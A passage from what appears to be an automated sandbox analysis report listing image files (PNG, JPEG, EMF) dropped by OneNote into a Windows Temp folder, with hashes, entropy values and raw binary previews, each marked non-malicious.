                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D61BCF5E-8C72-48FE-B805-13BF427317F4}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55804
                                                                                                                                            Entropy (8bit):7.433623355028275
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                            MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                            SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                            SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                            SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D6288182-E695-4BDD-933A-4593AF597228}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D66B7BFF-01D8-46BF-9367-49E1C243559A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D70B6360-0F1F-40D3-A41F-43BBDA39EF35}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D7631B87-392D-47E9-96B6-FE67C44DEF1D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DA7EACB8-D66B-40A2-9D1B-4A900F12BBDB}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3428
                                                                                                                                            Entropy (8bit):7.766473352510893
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                            MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                            SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                            SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                            SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DB8D6C78-6A44-468B-8B60-78C84D3B6D56}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):179460
                                                                                                                                            Entropy (8bit):7.979020171518325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                            MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                            SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                            SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                            SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DBD2033C-97DC-4CCE-B7BA-E3D1054EA345}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39010
                                                                                                                                            Entropy (8bit):7.362726513389497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                            MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                            SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                            SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                            SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DD7A1588-C58B-4D27-BA9A-6157BFF6A130}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DE207470-5147-434A-8215-8CF3D2F3A796}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15740
                                                                                                                                            Entropy (8bit):6.0674556182683945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                            MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                            SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                            SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                            SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DE9E90ED-2DB8-4DC7-B2D5-B0CEEF5ED5FB}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DF2EA9EC-BBCA-4033-9816-9387FCBB6C70}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136726
                                                                                                                                            Entropy (8bit):7.973487854173386
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                            MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                            SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                            SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                            SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E061354D-3772-45DE-9DEF-E01C8FE8216F}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
